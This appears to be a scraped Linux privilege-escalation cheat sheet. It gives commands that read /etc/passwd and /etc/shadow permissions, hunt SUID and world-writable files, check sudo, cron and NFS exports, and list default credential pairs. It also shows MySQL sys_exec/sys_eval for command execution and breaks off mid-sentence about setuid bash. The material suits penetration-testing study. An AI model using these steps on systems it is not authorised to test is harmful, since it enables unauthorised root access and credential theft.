Contents
1 2 3 4 5 6 7 |
# Print /etc/passwd cat /etc/passwd # Print only users who have shell access cat /etc/passwd | egrep -e '/bin/(ba)?sh' |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 |
# Duh. sudo su # View Permissions on Passwd ls -l /etc/passed # View Permissions on Shadow ls -l /etc/shadow # Check for Cron Jobs cat /etc/crontab # Check for Sudo Privs sudo -l # Check for Kernel Priv-Esc Exploits uname -a cat /etc/issue # Check /home persmissions ls -la /home # Check /root persmissions ls -l /root # SETUID Binaries ## Look for - Nmap,Vim,find,Bash,More,Less,Nano,cp,man find / -user root -perm -4000 -exec ls -ldb {} \; # User Writable files find / -type f ( ! -path "/proc" ) -writable 2>/dev/null | xargs ls -l # Check for NFS Shares cat /etc/exports ## If writeable, add /root, restart, and mount |
1 2 3 4 5 6 7 8 |
username:username username:username1 username:root username:admin username:qwerty username:password |
1 2 3 4 5 6 7 8 9 10 11 |
# Check for world writeable files find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null #Check for world writeable directories find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null #Look for interesint files: find / -name "*.txt" -ls 2> /dev/null find / -name "*.log" -ls 2> /dev/null |
If you find that mysql is running as root and you know the uname and pass:
1 2 3 4 |
select sys_exec('whoami'); select sys_eval('whoami'); |
ps -aux | grep root
You should be looking for possible local VNC sessions, or localhost processes that could possibly be hijacked. Even processes that generate files (i.e., call some program). remember, there may be a program running periodically without a cron job (Python while loop).
netstat -a | grep -i listen
netstat -ano
ls /etc/rc*
After setting a setuid bit on a binary such as bash, in order to retain the setuid privs, you must supply the -p flag: